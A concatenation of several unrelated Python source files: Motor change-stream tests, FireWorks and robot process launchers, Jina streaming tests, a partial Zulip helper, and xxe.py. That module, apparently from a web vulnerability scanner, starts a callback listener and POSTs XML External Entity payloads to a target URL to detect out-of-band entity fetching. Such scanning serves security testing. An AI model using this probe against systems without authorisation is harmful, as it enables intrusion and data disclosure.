years[movie['year']] += 1
if movie['added_date'][:-3] not in added_dates:
added_dates[movie['added_date'][:-3]] = 1
else:
added_dates[movie['added_date'][:-3]] += 1
score = round((float(movie['score']) * 2)) / 2
if score not in scores:
scores[score] = 1
else:
scores[score] += 1
stats['status'] = [{'label': k, 'value': v} for k, v in status.items()]
stats['qualities'] = [{'label': k, 'value': v} for k, v in qualities.items()]
if not category:
stats['categories'] = [{'label': k, 'value': v} for k, v in categories.items()]
stats['years'] = sorted([{'year': k, 'value': v} for k, v in years.items()], key=lambda k: k['year'])
stats['added_dates'] = sorted([{'added_date': k, 'value': v} for k, v in added_dates.items() if v is not None], key=lambda k: k['added_date'])
stats['scores'] = sorted([{'score': k, 'value': v} for k, v in scores.items()], key=lambda k: k['score'])
return stats
|
test_motor_change_stream.py | # Copyright 2017-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test MotorChangeStream."""
import copy
import threading
import time
from pymongo.errors import InvalidOperation, OperationFailure
from tornado.testing import gen_test
from test import SkipTest, env
from test.tornado_tests import MotorTest
from test.py35utils import wait_until
from test.utils import get_async_test_timeout
class MotorChangeStreamTest(MotorTest):
@classmethod
@env.require_version_min(3, 6)
def setUpClass(cls):
super().setUpClass()
if env.is_standalone:
raise SkipTest("Standalone")
# Ensure the collection exists.
env.sync_cx.motor_test.test_collection.delete_many({})
env.sync_cx.motor_test.test_collection.insert_one({'_id': 1})
def wait_and_insert(self, change_stream, n=1):
# The start time of the change stream is nondeterministic. Wait
# to ensure this insert comes after the change stream starts.
def target():
start = time.time()
timeout = get_async_test_timeout()
while not change_stream.delegate:
if time.time() - start > timeout:
print("MotorChangeStream never created ChangeStream")
return
time.sleep(0.1)
doclist = [{} for _ in range(n)] if isinstance(n, int) else n
self.io_loop.add_callback(self.collection.insert_many, doclist)
t = threading.Thread(target=target)
t.daemon = True
t.start()
@gen_test
async def test_async_for(self):
change_stream = self.collection.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
self.assertEqual(i, 2)
@gen_test
async def test_async_try_next(self):
change_stream = self.collection.watch()
# No changes.
doc = await change_stream.try_next()
self.assertIsNone(doc)
# Insert a change and ensure we see it via try_next.
idoc = {'_id': 1, 'data': 'abc'}
self.wait_and_insert(change_stream, [idoc])
while change_stream.alive:
change_doc = await change_stream.try_next()
if change_doc is not None:
break
self.assertEqual(change_doc['fullDocument'], idoc)
@env.require_version_min(4, 0, 7)
@gen_test
async def test_async_try_next_updates_resume_token(self):
change_stream = self.collection.watch(
[{"$match": {"fullDocument.a": 10}}])
# Get empty change, check non-empty resume token.
_ = await change_stream.try_next()
self.assertIsNotNone(change_stream.resume_token)
# Insert some record that don't match the change stream filter.
self.wait_and_insert(change_stream, [{'a': 19}, {'a': 20}])
# Ensure we see a new resume token even though we see no changes.
initial_resume_token = copy.copy(change_stream.resume_token)
async def token_change():
_ = await change_stream.try_next()
return change_stream.resume_token != initial_resume_token
await wait_until(token_change, "see a new resume token",
timeout=get_async_test_timeout())
@gen_test
async def test_watch(self):
coll = self.collection
with self.assertRaises(TypeError):
# pipeline must be a list.
async for _ in coll.watch(pipeline={}):
pass
change_stream = coll.watch()
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
change = await future
# New change stream with resume token.
await coll.insert_one({'_id': 23})
change = await coll.watch(resume_after=change['_id']).next()
self.assertEqual(change['fullDocument'], {'_id': 23})
@env.require_version_min(4, 2)
@gen_test
async def test_watch_with_start_after(self):
# Ensure collection exists before starting.
await self.collection.insert_one({})
# Create change stream before invalidate event.
change_stream = self.collection.watch(
[{'$match': {'operationType': 'invalidate'}}])
_ = await change_stream.try_next()
# Generate invalidate event and store corresponding resume token.
await self.collection.drop()
_ = await change_stream.next()
# v5.1 requires an extra getMore after an invalidate event to exhaust
# the cursor.
self.assertIsNone(await change_stream.try_next())
self.assertFalse(change_stream.alive)
resume_token = change_stream.resume_token
# Recreate change stream and observe from invalidate event.
doc = {'_id': 'startAfterTest'}
await self.collection.insert_one(doc)
change_stream = self.collection.watch(start_after=resume_token)
change = await change_stream.next()
self.assertEqual(doc, change['fullDocument'])
@gen_test
async def test_close(self):
coll = self.collection
change_stream = coll.watch()
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
await future
await change_stream.close()
with self.assertRaises(StopAsyncIteration):
await change_stream.next()
async for _ in change_stream:
pass
@gen_test
async def test_missing_id(self):
coll = self.collection
change_stream = coll.watch([{'$project': {'_id': 0}}])
future = change_stream.next()
self.wait_and_insert(change_stream)
with self.assertRaises((InvalidOperation, OperationFailure)):
await future
# The cursor should now be closed.
with self.assertRaises(StopAsyncIteration):
await change_stream.next()
@gen_test
async def test_unknown_full_document(self):
coll = self.collection
change_stream = coll.watch(full_document="unknownFullDocOption")
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
with self.assertRaises(OperationFailure):
await future
@gen_test
async def test_async_with(self):
async with self.collection.watch() as change_stream:
self.wait_and_insert(change_stream, 1)
async for _ in change_stream:
self.assertTrue(change_stream.delegate._cursor.alive)
break
self.assertFalse(change_stream.delegate._cursor.alive)
@gen_test
async def test_with_statement(self):
with self.assertRaises(RuntimeError):
with self.collection.watch():
pass
@env.require_version_min(4, 0)
@gen_test
async def test_client(self):
change_stream = self.cx.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
await self.cx.other_db.other_collection.insert_one({})
async for _ in change_stream:
i += 1
if i == 3:
break
@env.require_version_min(4, 0)
@gen_test
async def test_database(self):
change_stream = self.db.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
await self.db.other_collection.insert_one({})
async for _ in change_stream:
i += 1
if i == 3:
break
@gen_test
async def test_watch_with_session(self):
async with await self.cx.start_session() as session:
# Pass MotorSession.
async with self.collection.watch(session=session) as cs:
self.wait_and_insert(cs, 1)
_ = await cs.next()
# Pass PyMongo session directly.
async with self.collection.watch(session=session.delegate) as cs:
self.wait_and_insert(cs, 1)
_ = await cs.next()
|
xxe.py | import socket
import sys
import argparse
import requests
import threading
import time
import hashlib
import os
import sendrequest as req
import utils.logger as logger
import utils.logs as logs
from utils.db import Database_update
dbupdate = Database_update()
# Dummy response
data = b'''\
HTTP/1.1 200 OK\r\n\
Connection: close\r\n\
Content-Type: text/html\r\n\
Content-Length: 6\r\n\
\r\n\
Hello!\
'''
class xxe_scan:
def __init__(self):
self.port = 1111
self.host = socket.gethostbyname(socket.gethostname())
def generate_hash(self):
return hashlib.md5(str(time.time())).hexdigest()
def start_server(self):
self.s = socket.socket()
try:
self.s.bind((self.host, self.port))
logs.logging.info("XXE: Server started.")
return True
except socket.error:
logs.logging.info("XXE: Can't bind to port. Port may be busy or check firewall setting.")
def start_listening(self):
global vulnerable
vulnerable = False
try:
while True:
# Wait for 5 seconds
self.s.listen(5)
self.conn, self.addr = self.s.accept()
self.data = self.conn.recv(1024)
if self.data and unique_id in self.data:
#External DTD is enable. URL is suspecious to XXE
self.conn.sendall(data)
vulnerable = True
self.conn.close()
except socket.error:
print ("[-]URL might not be vulnerable to XXE. We reccomend you to check it manually")
self.conn.close()
def fetch_xxe_payload(self):
# Returns xxe payloads in list type
payload_list = []
if os.getcwd().split('/')[-1] == 'API':
path = '../Payloads/xxe.txt'
else:
path = 'Payloads/xxe.txt'
with open(path) as f:
for line in f:
if line:
payload_list.append(line.rstrip())
return payload_list
def send_request(self,url,method,temp_headers,xxe_payloads,scanid=None):
# Test if if server is accepiting XML data
sample_xml = '''<?xml version="1.0" encoding="UTF-8"?><text>hello world</text>'''
xml_request = requests.post(url, headers=temp_headers, data=sample_xml)
if xml_request.status_code == 415:
# Media type not supported.
return
global unique_id
unique_id = self.generate_hash()
host = "http://"+str(self.host)+":"+str(self.port)+"/"+unique_id
for payload in xxe_payloads:
payload = payload.replace("{host}",host)
xxe_request = requests.post(url, headers=temp_headers, data=payload)
time.sleep(10)
if vulnerable is True:
print ("[+]{0} is vulnerable to XML External Entity Attack".format(url))
attack_result = { "id" : 14, "scanid" : scanid, "url" : url, "alert": "XML External Entity Attack", "impact": "High", "req_headers": temp_headers, "req_body":payload, "res_headers": xxe_request.headers ,"res_body": xxe_request.text}
dbupdate.insert_record(attack_result)
break
def xxe_test(self,url,method,headers,body,scanid=None):
temp_headers = {}
temp_headers.update(headers)
xxe = xxe_scan()
socketresult = xxe.start_server()
if socketresult is True:
t = threading.Thread(target=xxe.start_listening)
t.daemon = True
t.start()
temp_headers['Content-Type'] = 'text/xml'
xxe_payloads = self.fetch_xxe_payload()
self.send_request(url,method,temp_headers,xxe_payloads,scanid) |
multi_launcher.py | """
This module contains methods for launching several Rockets in a parallel environment
"""
import os
import threading
import time
from multiprocessing import Manager, Process
from fireworks.core.rocket_launcher import rapidfire
from fireworks.fw_config import (
DS_PASSWORD,
PING_TIME_SECS,
RAPIDFIRE_SLEEP_SECS,
FWData,
)
from fireworks.utilities.fw_utilities import (
DataServer,
get_fw_logger,
get_my_host,
log_multi,
)
__author__ = "Xiaohui Qu, Anubhav Jain"
__copyright__ = "Copyright 2013, The Material Project & The Electrolyte Genome Project"
__version__ = "0.1"
__maintainer__ = "Xiaohui Qu"
__email__ = "xqu@lbl.gov"
__date__ = "Aug 19, 2013"
def ping_multilaunch(port, stop_event):
"""
A single manager to ping all launches during multiprocess launches
Args:
port (int): Listening port number of the DataServer
stop_event (Thread.Event): stop event
"""
ds = DataServer(address=("127.0.0.1", port), authkey=DS_PASSWORD)
ds.connect()
fd = FWData()
lp = ds.LaunchPad()
while not stop_event.is_set():
for pid, lid in fd.Running_IDs.items():
if lid:
try:
os.kill(pid, 0) # throws OSError if the process is dead
lp.ping_launch(lid)
except OSError: # means this process is dead!
fd.Running_IDs[pid] = None
stop_event.wait(PING_TIME_SECS)
def rapidfire_process(
fworker, nlaunches, sleep, loglvl, port, node_list, sub_nproc, timeout, running_ids_dict, local_redirect
):
"""
Initializes shared data with multiprocessing parameters and starts a rapidfire.
Args:
fworker (FWorker): object
nlaunches (int): 0 means 'until completion', -1 or "infinite" means to loop forever
sleep (int): secs to sleep between rapidfire loop iterations
loglvl (str): level at which to output logs to stdout
port (int): Listening port number of the shared object manage
password (str): security password to access the server
node_list ([str]): computer node list
sub_nproc (int): number of processors of the sub job
timeout (int): # of seconds after which to stop the rapidfire process
local_redirect (bool): redirect standard input and output to local file
"""
ds = DataServer(address=("127.0.0.1", port), authkey=DS_PASSWORD)
ds.connect()
launchpad = ds.LaunchPad()
FWData().DATASERVER = ds
FWData().MULTIPROCESSING = True
FWData().NODE_LIST = node_list
FWData().SUB_NPROCS = sub_nproc
FWData().Running_IDs = running_ids_dict
sleep_time = sleep if sleep else RAPIDFIRE_SLEEP_SECS
l_dir = launchpad.get_logdir() if launchpad else None
l_logger = get_fw_logger("rocket.launcher", l_dir=l_dir, stream_level=loglvl)
rapidfire(
launchpad,
fworker=fworker,
m_dir=None,
nlaunches=nlaunches,
max_loops=-1,
sleep_time=sleep,
strm_lvl=loglvl,
timeout=timeout,
local_redirect=local_redirect,
)
while nlaunches == 0:
time.sleep(1.5) # wait for LaunchPad to be initialized
launch_ids = FWData().Running_IDs.values()
live_ids = list(set(launch_ids) - {None})
if len(live_ids) > 0:
# Some other sub jobs are still running
log_multi(l_logger, f"Sleeping for {sleep_time} secs before resubmit sub job")
time.sleep(sleep_time)
log_multi(l_logger, "Resubmit sub job")
rapidfire(
launchpad,
fworker=fworker,
m_dir=None,
nlaunches=nlaunches,
max_loops=-1,
sleep_time=sleep,
strm_lvl=loglvl,
timeout=timeout,
local_redirect=local_redirect,
)
else:
break
log_multi(l_logger, "Sub job finished")
def start_rockets(
fworker,
nlaunches,
sleep,
loglvl,
port,
node_lists,
sub_nproc_list,
timeout=None,
running_ids_dict=None,
local_redirect=False,
):
"""
Create each sub job and start a rocket launch in each one
Args:
fworker (FWorker): object
nlaunches (int): 0 means 'until completion', -1 or "infinite" means to loop forever
sleep (int): secs to sleep between rapidfire loop iterations
loglvl (str): level at which to output logs to stdout
port (int): Listening port number
node_lists ([str]): computer node list
sub_nproc_list ([int]): list of the number of the process of sub jobs
timeout (int): # of seconds after which to stop the rapidfire process
running_ids_dict (dict): Shared dict between process to record IDs
local_redirect (bool): redirect standard input and output to local file
Returns:
([multiprocessing.Process]) all the created processes
"""
processes = [
Process(
target=rapidfire_process,
args=(fworker, nlaunches, sleep, loglvl, port, nl, sub_nproc, timeout, running_ids_dict, local_redirect),
)
for nl, sub_nproc in zip(node_lists, sub_nproc_list)
]
for p in processes:
p.start()
time.sleep(0.15)
return processes
def split_node_lists(num_jobs, total_node_list=None, ppn=24):
"""
Parse node list and processor list from nodefile contents
Args:
num_jobs (int): number of sub jobs
total_node_list (list of str): the node list of the whole large job
ppn (int): number of procesors per node
Returns:
(([int],[int])) the node list and processor list for each job
"""
if total_node_list:
orig_node_list = sorted(list(set(total_node_list)))
nnodes = len(orig_node_list)
if nnodes % num_jobs != 0:
raise ValueError(f"can't allocate nodes, {nnodes} can't be divided by {num_jobs}")
sub_nnodes = nnodes // num_jobs
sub_nproc_list = [sub_nnodes * ppn] * num_jobs
node_lists = [orig_node_list[i : i + sub_nnodes] for i in range(0, nnodes, sub_nnodes)]
else:
sub_nproc_list = [ppn] * num_jobs
node_lists = [None] * num_jobs
return node_lists, sub_nproc_list
# TODO: why is loglvl a required parameter??? Also nlaunches and sleep_time could have a sensible default??
def launch_multiprocess(
launchpad,
fworker,
loglvl,
nlaunches,
num_jobs,
sleep_time,
total_node_list=None,
ppn=1,
timeout=None,
exclude_current_node=False,
local_redirect=False,
):
"""
Launch the jobs in the job packing mode.
Args:
launchpad (LaunchPad)
fworker (FWorker)
loglvl (str): level at which to output logs
nlaunches (int): 0 means 'until completion', -1 or "infinite" means to loop forever
num_jobs(int): number of sub jobs
sleep_time (int): secs to sleep between rapidfire loop iterations
total_node_list ([str]): contents of NODEFILE (doesn't affect execution)
ppn (int): processors per node (doesn't affect execution)
timeout (int): # of seconds after which to stop the rapidfire process
exclude_current_node: Don't use the script launching node as a compute node
local_redirect (bool): redirect standard input and output to local file
"""
# parse node file contents
if exclude_current_node:
host = get_my_host()
l_dir = launchpad.get_logdir() if launchpad else None
l_logger = get_fw_logger("rocket.launcher", l_dir=l_dir, stream_level=loglvl)
if host in total_node_list:
log_multi(l_logger, f'Remove the current node "{host}" from compute node')
total_node_list.remove(host)
else:
log_multi(l_logger, "The current node is not in the node list, keep the node list as is")
node_lists, sub_nproc_list = split_node_lists(num_jobs, total_node_list, ppn)
# create shared dataserver
ds = DataServer.setup(launchpad)
port = ds.address[1]
manager = Manager()
running_ids_dict = manager.dict()
# launch rapidfire processes
processes = start_rockets(
fworker,
nlaunches,
sleep_time,
loglvl,
port,
node_lists,
sub_nproc_list,
timeout=timeout,
running_ids_dict=running_ids_dict,
local_redirect=local_redirect,
)
FWData().Running_IDs = running_ids_dict
# start pinging service
ping_stop = threading.Event()
ping_thread = threading.Thread(target=ping_multilaunch, args=(port, ping_stop))
ping_thread.start()
# wait for completion
for p in processes:
p.join()
ping_stop.set()
ping_thread.join()
ds.shutdown()
|
init.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
app_dir = os.path.normpath(os.path.join(os.getcwd(),
os.path.dirname(__file__)))
sys.path.append(os.path.dirname(app_dir))
sys.path.append(os.path.dirname(app_dir) + '/../')
from core.config import settings
from core.config.settings import logger
import subprocess
import signal
def process_exists(process):
"""docstring for process_exists"""
pid = False
g = os.popen("ps -e -o pid,command")
for line in g.readlines():
if process in line:
pid = line.strip().split(' ')[0]
break
return pid
if __name__ == '__main__':
jobs = []
try:
if settings.JABBER_ENABLED:
# start jabber
jpid = process_exists('jabber/connect.py')
if not jpid:
logger.info('Start jabber connector subprocess '
+ "%s/core/lib/jabber/connect.py"
% settings.ROBOT_DIR)
jabber_proc = subprocess.Popen(
["python", "%s/core/lib/jabber/connect.py"
% settings.ROBOT_DIR]
)
else:
logger.info('Jabber connector is already running, skip...')
## start sensor fifo output process
#sensor1_proc = subprocess.Popen(
#["python" ,
#"%s/core/device/head/sensor/sound/source_direction.py"
#% settings.ROBOT_DIR],
#shell=False,
#stdin=subprocess.PIPE,
#stdout=subprocess.PIPE )
#logger.info("%s", sensor1_proc.communicate())
#q = Queue()
#p = Process(target=read_sensor_data, args=(q,))
#p.start()
#jobs.append(p)
#join proceses
#for p in jobs:
##direction = q.get()
#p.join()
#logger.info("%s", julius_proc.communicate())
#else:
#logger.info('Julius is already running, skip...')
sid = process_exists('core/scheduler/at.py')
if not sid:
logger.info("Start scheduler subprocess")
sched_proc = subprocess.Popen(
["python", "%s/core/scheduler/at.py" % settings.ROBOT_DIR]
)
else:
logger.info("Scheduler subprocess already running, skip...")
scid = process_exists('core/scheduler/connect.py')
if not scid:
logger.info("Start scheduler connector subprocess")
schedc_proc = subprocess.Popen(
["python", "%s/core/scheduler/connect.py" % settings.ROBOT_DIR]
)
else:
logger.info("Scheduler connector subprocess already running, skip...")
opid = process_exists('core/output.py')
if not opid:
logger.info("Start output subprocess")
brain_proc = subprocess.Popen(
["python", "%s/core/output.py" % settings.ROBOT_DIR]
)
else:
logger.info("Output process already running, skip...")
bpid = process_exists('brain/listener.py')
if not bpid:
logger.info("Start brain listener subprocess")
brain_proc = subprocess.Popen(
["python", "%s/core/brain/listener.py" % settings.ROBOT_DIR]
)
else:
logger.info("Brain listener subprocess already running, skip...")
#brain_proc.communicate()
logger.info("Start main process")
main_proc = subprocess.Popen(
["python", "%s/core/main.py" % settings.ROBOT_DIR]
)
if settings.SPEECH_RECOGNITION_ENABLED:
#start julius
logger.info('Start julius recognition service.')
#julius_proc = subprocess.Popen(
##["julius", "-quiet", "-input", "mic"
#, "-C" ,"%s/core/lib/julius/julian.jconf"
#% settings.ROBOT_DIR , "-module"]
#["padsp", "julius", "-quiet", "-input",
#"mic", "-C" ,"%s/core/lib/julius/julian.jconf"
#% settings.ROBOT_DIR , "-module"]
#)
#start julius connector
jupid = process_exists('julius/connect.py')
if not jupid:
logger.info('Start julius connector '
+ "%s/core/lib/julius/connect.py"
% settings.ROBOT_DIR)
julius_conn_proc = subprocess.Popen(
["python", "%s/core/lib/julius/connect.py"
% settings.ROBOT_DIR]
)
##logger.debug("process id: %s"
#, julius_conn_proc.communicate()[0])
#julius_conn_proc.communicate()
#logger.debug("process id: %s"
#, julius_conn_proc.communicate()[0])
else:
logger.info('Julius connector is already running, skip...')
#ask via jabber first
apid = subprocess.Popen(
["python", "%s/core/brain/ask.py"
% settings.ROBOT_DIR]
)
# run main process
main_proc.communicate()
except KeyboardInterrupt:
# dpid = process_exists('source_direction')
# logger.info( 'Stop sound source detector %s ', dpid )
# os.kill(int(dpid), signal.SIGHUP)
sid = process_exists('scheduler/at.py')
logger.info('Terminate scheduller connector process %s ', sid)
os.kill(int(sid), signal.SIGHUP)
scid = process_exists('scheduler/connect.py')
logger.info('Terminate scheduler connector process %s ', scid)
os.kill(int(scid), signal.SIGHUP)
jpid = process_exists('jabber/connect.py')
logger.info('Terminate jabber connector process %s ', jpid)
os.kill(int(jpid), signal.SIGHUP)
jupid = process_exists('julius/connect.py')
logger.info('Terminate julius connector process %s ', jupid)
os.kill(int(jupid), signal.SIGHUP)
ipid = process_exists('init.py')
logger.info('Terminate main %s ', ipid)
os.kill(int(ipid), signal.SIGHUP)
bpid = process_exists('brain/listener.py')
logger.info('Terminate brain listener process %s ', bpid)
os.kill(int(bpid), signal.SIGHUP)
opid = process_exists('core/output.py')
logger.info('Terminate output process %s ', opid)
os.kill(int(opid), signal.SIGHUP)
apid = process_exists('brain/ask.py')
logger.info('Terminate ask process %s ', apid)
os.kill(int(apid), signal.SIGHUP)
|
test_clients_streaming.py | import os
import time, asyncio
from typing import List
from datetime import datetime
from functools import partial
from multiprocessing import Process, current_process
import pytest
from jina import Flow, Document, DocumentArray, Executor, requests, Client
INPUT_LEN = 4
INPUT_GEN_SLEEP_TIME = 1
SLOW_EXECUTOR_SLEEP_TIME = 5
def readable_time_from(t):
return datetime.utcfromtimestamp(t).strftime('%M:%S:%f')
def get_document(i, name):
t = time.time()
print(f'in {name} {i}, time: {readable_time_from(t)}, {t}', flush=True)
return Document(id=f'id-{i}', tags={'input_gen': t})
def blocking_gen():
"""Fast synchronous client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='blocking_gen')
time.sleep(0.1)
async def async_gen():
"""Fast async client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='async_gen')
await asyncio.sleep(0.1)
def slow_blocking_gen():
"""Slow synchronous client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='slow_blocking_gen')
time.sleep(INPUT_GEN_SLEEP_TIME)
async def slow_async_gen():
"""Slow async client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='slow_async_gen')
await asyncio.sleep(INPUT_GEN_SLEEP_TIME)
class FastExecutor(Executor):
"""Fast Executor"""
@requests
def foo(self, docs: DocumentArray, **kwargs):
for doc in docs:
doc.tags['executor'] = time.time()
print(
f'in FastExecutor: {doc.id}, time: {readable_time_from(doc.tags["executor"])}, {doc.tags["executor"]}',
flush=True,
)
class SlowExecutor(Executor):
"""Slow Executor (sleeps DELAYED_EXECUTOR_SLEEP_TIME secs b/w each req)"""
@requests
def foo(self, docs: DocumentArray, **kwargs):
time.sleep(SLOW_EXECUTOR_SLEEP_TIME)
for doc in docs:
doc.tags['executor'] = time.time()
print(
f'in SlowExecutor: {doc.id}, time: {readable_time_from(doc.tags["executor"])}, {doc.tags["executor"]}',
flush=True,
)
def on_done(response, final_da: DocumentArray):
print(f' receiving response {response._pb_body.request_id}')
for doc in response.docs:
doc.tags['on_done'] = time.time()
print(
f'in on_done {doc.id}, time: {readable_time_from(doc.tags["on_done"])}, {doc.tags["on_done"]}',
flush=True,
)
final_da.extend(response.docs)
@pytest.mark.parametrize('grpc_data_requests', [False, True])
@pytest.mark.parametrize(
'protocol, inputs',
[
('grpc', slow_async_gen),
pytest.param(
'grpc',
slow_blocking_gen,
marks=pytest.mark.skip(
reason='grpc client + sync generator with time.sleep is expected to fail'
),
),
('websocket', slow_async_gen),
('websocket', slow_blocking_gen),
('http', slow_async_gen),
('http', slow_blocking_gen),
],
)
def test_disable_prefetch_slow_client_fast_executor(
grpc_data_requests, protocol, inputs
):
print(
f'\n\nRunning disable prefetch, slow client, fast Executor test for \n'
f'protocol: {protocol}, input: {inputs.__name__}, grpc_data_req: {grpc_data_requests}'
)
final_da = DocumentArray()
with Flow(protocol=protocol, grpc_data_requests=grpc_data_requests).add(
uses=FastExecutor
) as f:
f.post(
on='/',
inputs=inputs,
request_size=1,
on_done=lambda response: on_done(response, final_da),
)
assert len(final_da) == INPUT_LEN
# Since the input_gen is slow, order will always be gen -> exec -> on_done for every request
assert final_da['id-0'].tags['input_gen'] < final_da['id-0'].tags['executor']
assert final_da['id-0'].tags['executor'] < final_da['id-0'].tags['on_done']
assert final_da['id-0'].tags['on_done'] < final_da['id-1'].tags['input_gen']
assert final_da['id-1'].tags['input_gen'] < final_da['id-1'].tags['executor']
assert final_da['id-1'].tags['executor'] < final_da['id-1'].tags['on_done']
assert final_da['id-1'].tags['on_done'] < final_da['id-2'].tags['input_gen']
assert final_da['id-2'].tags['input_gen'] < final_da['id-2'].tags['executor']
assert final_da['id-2'].tags['executor'] < final_da['id-2'].tags['on_done']
assert final_da['id-2'].tags['on_done'] < final_da['id-3'].tags['input_gen']
assert final_da['id-3'].tags['input_gen'] < final_da['id-3'].tags['executor']
assert final_da['id-3'].tags['executor'] < final_da['id-3'].tags['on_done']
@pytest.mark.parametrize('grpc_data_requests', [True, False])
@pytest.mark.parametrize(
'protocol, inputs',
[
('grpc', async_gen),
('grpc', blocking_gen),
('websocket', async_gen),
('websocket', blocking_gen),
('http', async_gen),
('http', blocking_gen),
],
)
def test_disable_prefetch_fast_client_slow_executor(
grpc_data_requests, protocol, inputs
):
print(
f'\n\nRunning disable prefetch, fast client, slow Executor test for \n'
f'protocol: {protocol}, input: {inputs.__name__}, grpc_data_req: {grpc_data_requests}'
)
final_da = DocumentArray()
with Flow(protocol=protocol, grpc_data_requests=grpc_data_requests).add(
uses=SlowExecutor
) as f:
f.post(
on='/',
inputs=inputs,
request_size=1,
on_done=lambda response: on_done(response, final_da),
)
assert len(final_da) == INPUT_LEN
# since Executor is slow, all client inputs should be read before 1st request exits from Executor.
assert (
final_da['id-0'].id < final_da['id-1'].id
), f'ids are not ordered with times {final_da["id-0"].tags["input_gen"]} and {final_da["id-1"].tags["input_gen"]}'
assert (
final_da['id-1'].id < final_da['id-2'].id
), f'ids are not ordered with times {final_da["id-1"].tags["input_gen"]} and {final_da["id-2"].tags["input_gen"]}'
assert (
final_da['id-2'].id < final_da['id-3'].id
), f'ids are not ordered with times {final_da["id-2"].tags["input_gen"]} and {final_da["id-3"].tags["input_gen"]}'
assert final_da['id-0'].tags['input_gen'] < final_da['id-1'].tags['input_gen']
assert final_da['id-1'].tags['input_gen'] < final_da['id-2'].tags['input_gen']
assert final_da['id-2'].tags['input_gen'] < final_da['id-3'].tags['input_gen']
assert final_da['id-3'].tags['input_gen'] < final_da['id-0'].tags['executor']
# At least 1 request should reache `on_done` before all requests are processed in the Executor.
# Validates that the requests are not pending at the Executor
first_on_done_time = min(i.tags['on_done'] for i in final_da)
last_executor_time = max(i.tags['executor'] for i in final_da)
assert first_on_done_time < last_executor_time
class Indexer(Executor):
docs = DocumentArray()
@requests(on='/index')
def index(self, docs: DocumentArray, **kwargs):
time.sleep(0.1)
self.docs.extend(docs)
@requests(on='/status')
def status(self, **kwargs):
# returns ids of all docs in tags
return DocumentArray(Document(tags={'ids': self.docs.get_attributes('id')}))
@pytest.mark.parametrize('prefetch', [0, 5])
@pytest.mark.parametrize('protocol', ['websocket', 'http', 'grpc'])
@pytest.mark.parametrize('grpc_data_requests', [False, True])
def test_multiple_clients(prefetch, protocol, grpc_data_requests):
os.environ['JINA_LOG_LEVEL'] = 'INFO'
GOOD_CLIENTS = 5
GOOD_CLIENT_NUM_DOCS = 20
MALICIOUS_CLIENT_NUM_DOCS = 50
def get_document(i):
return Document(
id=f'{current_process().name}_{i}',
buffer=bytes(bytearray(os.urandom(512 * 4))),
)
async def good_client_gen():
for i in range(GOOD_CLIENT_NUM_DOCS):
yield get_document(i)
await asyncio.sleep(0.1)
async def malicious_client_gen():
for i in range(1000, 1000 + MALICIOUS_CLIENT_NUM_DOCS):
yield get_document(i)
def client(gen, port, protocol):
Client(protocol=protocol, port=port).post(
on='/index', inputs=gen, request_size=1
)
pool: List[Process] = []
f = Flow(
protocol=protocol, prefetch=prefetch, grpc_data_requests=grpc_data_requests
).add(uses=Indexer)
with f:
# We have 5 good clients connecting to the same gateway. They have controlled requests.
# Each client sends `GOOD_CLIENT_NUM_DOCS` (20) requests and sleeps after each request.
for i in range(GOOD_CLIENTS):
p = Process(
target=partial(client, good_client_gen, f.port_expose, protocol),
name=f'goodguy_{i}',
)
p.start()
pool.append(p)
# and 1 malicious client, sending lot of requests (trying to block others)
p = Process(
target=partial(client, malicious_client_gen, f.port_expose, protocol),
name='badguy',
)
p.start()
pool.append(p)
for p in pool:
p.join()
order_of_ids = list(
Client(protocol=protocol, port=f.port_expose)
.post(on='/status', inputs=[Document()], return_results=True)[0]
.docs[0]
.tags['ids']
)
# There must be total 150 docs indexed.
assert (
len(order_of_ids)
== GOOD_CLIENTS * GOOD_CLIENT_NUM_DOCS + MALICIOUS_CLIENT_NUM_DOCS
)
"""
If prefetch is set, each Client is allowed (max) 5 requests at a time.
Since requests are controlled, `badguy` has to do the last 20 requests.
If prefetch is disabled, clients can freeflow requests. No client is blocked.
Hence last 20 requests go from `goodguy`.
(Ideally last 30 requests should be validated, to avoid flaky CI, we test last 20)
When there are no rules, badguy wins! With rule, you find balance in the world.
"""
if protocol == 'http':
# There's no prefetch for http.
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {
'goodguy'
}
elif prefetch == 5:
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'badguy'}
elif prefetch == 0:
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {
'goodguy'
}
|
helper.py | import os
import platform
import shlex
import subprocess
import time
from collections import defaultdict
from functools import wraps
from itertools import chain, combinations
from re import ASCII, match
from threading import Thread
from typing import (
Any, Callable, DefaultDict, Dict, FrozenSet, Iterable, List, Optional, Set,
Tuple, Union,
)
import lxml.html
from mypy_extensions import TypedDict
MACOS = platform.system() == "Darwin"
LINUX = platform.system() == "Linux"
WSL = 'Microsoft' in platform.release()
Message = Dict[str, Any]
Index = TypedDict('Index', {
'pointer': Dict[str, Union[int, Set[None]]], # narrow_str, message_id
# Various sets of downloaded message ids (all, starred, ...)
'all_msg_ids': Set[int],
'starred_msg_ids': Set[int],
'private_msg_ids': Set[int],
'private_msg_ids_by_user_ids': Dict[FrozenSet[int], Set[int]],
'stream_msg_ids_by_stream_id': Dict[int, Set[int]],
'topic_msg_ids': Dict[int, Dict[str, Set[int]]],
# Extra cached information
'edited_messages': Set[int], # {message_ids, ...}
'topics': Dict[int, List[str]], # {topic names, ...}
'search': Set[int], # {message_id, ...}
# Downloaded message data
'messages': Dict[int, Message], # message_id: Message
# unread message data; additional data in model.initial_data['unread_msgs']
